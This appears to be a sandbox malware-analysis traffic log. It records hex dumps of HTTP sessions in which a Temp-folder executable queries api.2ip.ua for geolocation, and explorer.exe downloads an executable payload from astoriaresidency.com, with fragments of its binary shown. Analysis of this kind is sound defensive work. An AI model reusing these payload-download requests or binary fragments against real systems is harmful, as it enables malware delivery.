                                                                                                  2023-06-21 18:24:31 UTC705INData Raw: 32 30 30 30 0d 0a 83 00 00 00 28 04 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 7f 04 00 00 40 04 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 49 04 00 00 68 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 49 04 00 00 78 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 49 04 00 00 88 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 98 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 49 04 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 49 04 00 00 b8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 49 04 00 00 c8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 49 04 00 00 d8 04 00 00 00
                                                                                                  Data Ascii: 2000(@XIhIxIIIII
                                                                                                  2023-06-21 18:24:31 UTC713INData Raw: 7f 80 7f 7f 81 81
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC713INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC713INData Raw: 32 30 30 30 0d 0a 80 80 7f 7f 80 80 80 81 80 7f 80 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC721INData Raw: 7e 00 81 80 7f 00
                                                                                                  Data Ascii: ~
                                                                                                  2023-06-21 18:24:31 UTC721INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC721INData Raw: 32 30 30 30 0d 0a 80 7e 7f 00 80 80 7f 00 80 7e 80 00 80 7f 7e 00 7f 80 81 00 7f 7e 80 00 7f 7e 80 00 80 7f 7e 00 7e 7f 7f 00 81 81 7e 00 81 80 7f 00 7e 7f 80 00 7f 7f 7f 00 7e 7f 80 00 81 7e 80 00 80 81 80 00 7f 80 80 00 7f 80 81 00 80 7e 80 00 7f 80 7f 00 7f 7f 80 00 81 7f 80 00 80 81 7f 00 7f 80 80 00 81 7f 7f 00 80 80 80 00 7f 7f 80 00 7f 80 80 00 7e 80 80 00 80 81 7f 00 7e 7e 81 00 7f 7f 7f 00 7e 81 7e 00 81 81 81 00 7e 80 7f 00 7e 7f 7e 00 81 7e 81 00 7f 7f 80 00 80 7f 7f 00 7e 80 81 00 7e 81 80 00 81 80 7e 00 80 81 7f 00 7e 7f 7f 00 80 7f 80 00 80 80 7f 00 80 7f 7f 00 80 7f 7f 00 81 80 80 00 7f 81 7f 00 80 7f 7f 00 7e 7e 7f 00 80 80 81 00 80 80 81 00 7f 81 7f 00 81 80 81 00 7e 7e 80 00 80 81 80 00 7f 7f 7f 00 81 7f 7f 00 7e 80 81 00 80 80 7f 00 7f
                                                                                                  Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                  2023-06-21 18:24:31 UTC729INData Raw: 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC729INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC729INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 80 80 7f 7e 81 80 7f 80 80 81 80 7f 7f 7f 80 7f 80 81 7f 80 7e 80 7e 7e 80 7f 7e 7f 80 7f 7f 80 7f 7f 81 80 7f 80 7e 80 80 80 7f 80 80 7f 81 81 7f 81 80 7e 80 7f 80 81 7e 80 7e 7f 80 7f 7f 7f 80 7f 7f 7f 7f 7f 7f 7e 7f 7f 7f 7e 7f 81 7e 80 7e 7f 7f 81 81 80 80 81 7f 81 7f 80 7f 81 7e 81 7f 80 7e 81 81 80 7f 81 7f 7f 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 7e 7f 7f 80 80 7e 7f 7f 7f 81 81 81 81 80 80 80 80 7e 7e 7f 80 80 7e 7f 80 7e 7f 80 7f 7e 81 7f 7f 80 81 7f 7f 7e 7e 7f 7e 7e 7e 81
                                                                                                  Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                  2023-06-21 18:24:31 UTC737INData Raw: e0 00 0f ff 00 00
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC737INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC737INData Raw: 31 66 66 38 0d 0a e3 ff f0 7c 00 3f 00 00 f0 00 00 00 00 07 00 00 ff 00 00 00 00 07 00 00 ff ff f8 ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 80 7f 7f 7e 7f 81 7f 7f 7f 7f 80 7e 80 81 80 7f 81 7f 80 7f 7f 7f 80 80 7f 80 7f 80 80 7f 80 81 80 7e 80 80 80 80 7f 81 80 80 7e 7f 80 80 7f 80 7e 7f 80 81 7f 7e 7f 81 80 7e 7e 81 7e 7e 7e 7f 7f 7e 7e 80 80 7f 7e 7f 7f 81 81 80 7f 7e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 80 7f 7e 80 7e 7e 80 80 81 7f 7e 00 00 00 00 00
                                                                                                  Data Ascii: 1ff8|?( @ ~~~~~~~~~~~~~~~~~~~
                                                                                                  2023-06-21 18:24:31 UTC745INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC745INData Raw: 70 2e 20 56 75 78 20 73 65 72 65 6e 20 77 75 73 75 67 61 66 69 2e 20 57 69 78 69 74 69 64 69 6e 6f 20 66 65 6c 6f 68 61 79 61 79 6f 78 6f 6c 69 63 20 63 65 66 75 67 61 2e 20 5a 6f 74 6f 76 65 70 65 72 6f 6a 65 6d 20 6a 61 6b 61 20 6c 6f 70 6f 64 75 74 65 68 69 78 65 63 61 6b 20 78 65 6d 69 70 75 7a 65 72 6f 6c 61 68 20 64 61 67 69 74 6f 77 61 74 75 62 2e 20 4b 69 79 65 73 75 20 73 75 7a 69 72 69 6d 75 72 69 20 63 75 74 69 2e 20 4b 6f 70 65 6b 20 6c 6f 66 65 20 72 6f 63 69 6e 75 73 20 6c 69 6b 75 6e 75 66 69 72 61 66 65 6d 20 73 6f 66 6f 74 61 2e 20 58 75 78 69 20 62 75 6a 65 7a 75 68 75 73 75 6b 75 2e 20 4e 61 6c 75 63 61 74 65 64 65 7a 6f 20 68 6f 74 69 72 61 6a 61 20 63 75 6d 61 76 75 78 61 66 6f 62 6f 20 68 65 6a 75 73 61 7a 6f 77 61 2e 20 43 75 73 6f
                                                                                                  Data Ascii: p. Vux seren wusugafi. Wixitidino felohayayoxolic cefuga. Zotoveperojem jaka lopodutehixecak xemipuzerolah dagitowatub. Kiyesu suzirimuri cuti. Kopek lofe rocinus likunufirafem sofota. Xuxi bujezuhusuku. Nalucatedezo hotiraja cumavuxafobo hejusazowa. Cuso
                                                                                                  2023-06-21 18:24:31 UTC753INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC753INData Raw: 32 30 30 30 0d 0a 74 20 67 6f 74 69 73 75 63 6f 20 6d 65 68 75 64 6f 6c 6f 2e 20 4a 75 79 61 70 75 68 6f 6d 6f 6d 6f 72 69 20 74 69 6a 75 76 6f 66 69 20 70 61 63 75 7a 75 64 65 66 65 70 6f 6b 61 67 20 77 75 72 69 6c 65 67 75 6d 61 66 75 2e 20 48 65 70 20 6e 65 62 6f 63 65 6a 65 68 20 67 65 68 69 79 61 78 75 6c 75 73 61 66 61 20 73 6f 67 2e 20 4b 65 64 65 20 64 75 6e 2e 20 56 65 66 65 63 65 66 61 6a 2e 20 46 69 7a 69 77 6f 7a 20 68 61 63 69 7a 61 68 6f 20 6c 69 70 61 66 65 7a 6f 70 61 68 69 6d 69 2e 20 52 65 70 20 6b 69 77 65 77 61 63 69 74 75 20 74 61 6b 6f 62 6f 62 69 63 69 6b 61 20 74 69 63 6f 64 75 76 69 63 6f 67 65 70 65 6b 2e 20 42 6f 67 69 79 61 79 61 70 6f 77 6f 6e 61 20 67 69 6d 6f 76 75 66 20 74 6f 7a 6f 67 61 74 69 6d 65 63 65 6b 69 20 76 75 6e
                                                                                                  Data Ascii: 2000t gotisuco mehudolo. Juyapuhomomori tijuvofi pacuzudefepokag wurilegumafu. Hep nebocejeh gehiyaxulusafa sog. Kede dun. Vefecefaj. Fiziwoz hacizaho lipafezopahimi. Rep kiwewacitu takobobicika ticoduvicogepek. Bogiyayapowona gimovuf tozogatimeceki vun
                                                                                                  2023-06-21 18:24:31 UTC761INData Raw: 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC761INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC761INData Raw: 34 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.449701162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:23:53 UTC2OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:23:53 UTC2INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:23:53 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:23:53 UTC2INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.2.449702162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:23:53 UTC3OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:23:53 UTC3INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:23:53 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:23:53 UTC4INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.2.449705162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:23:56 UTC4OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:23:56 UTC4INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:23:56 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:23:56 UTC5INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.2.449708162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:23:57 UTC5OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:23:57 UTC5INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:23:57 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:23:57 UTC6INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.2.449709162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:01 UTC6OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:24:01 UTC7INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:24:01 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:24:01 UTC7INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  7192.168.2.449711103.233.24.19443C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:02 UTC8OUTGET /tmp/index.php HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Host: astoriaresidency.com
                                                                                                  2023-06-21 18:24:02 UTC8INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 21 Jun 2023 18:24:02 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Description: File Transfer
                                                                                                  Content-Disposition: attachment; filename=8158eba8.exe
                                                                                                  Content-Transfer-Encoding: binary
                                                                                                  Expires: 0
                                                                                                  Cache-Control: must-revalidate
                                                                                                  Pragma: public
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: application/octet-stream
                                                                                                  2023-06-21 18:24:02 UTC8INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8a dd 99 f5 ce bc f7 a6 ce bc f7 a6 ce bc f7 a6 5d f2 6f a6 cf bc f7 a6 a1 ca 69 a6 da bc f7 a6 a1 ca 5d a6 a0 bc f7 a6 a1 ca 5c a6 ec bc f7 a6 c7 c4 64 a6 cb bc f7 a6 ce bc f6 a6 b1 bc f7 a6 a1 ca 58 a6 cf bc f7 a6 a1 ca 6d a6 cf bc f7 a6 a1 ca 6a a6 cf bc f7 a6 52 69 63 68 ce bc f7 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50
                                                                                                  Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$]oi]\dXmjRichP
                                                                                                  2023-06-21 18:24:02 UTC16INData Raw: 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 20 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 27 00 00 00 20 43 6c 61 73 73 20 48 69 65 72 61 72 63 68 79 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 41 72 72 61 79 27 00
                                                                                                  Data Ascii: PQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ Complete Object Locator' Class Hierarchy Descriptor' Base Class Array'
                                                                                                  2023-06-21 18:24:02 UTC16INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC16INData Raw: 32 30 30 30 0d 0a 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27
                                                                                                  Data Ascii: 2000 constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'
                                                                                                  2023-06-21 18:24:03 UTC24INData Raw: e8 3f 0f 00 00 c7
                                                                                                  Data Ascii: ?
                                                                                                  2023-06-21 18:24:03 UTC24INData Raw: 0d 0a
                                                                                                  Data Ascii:
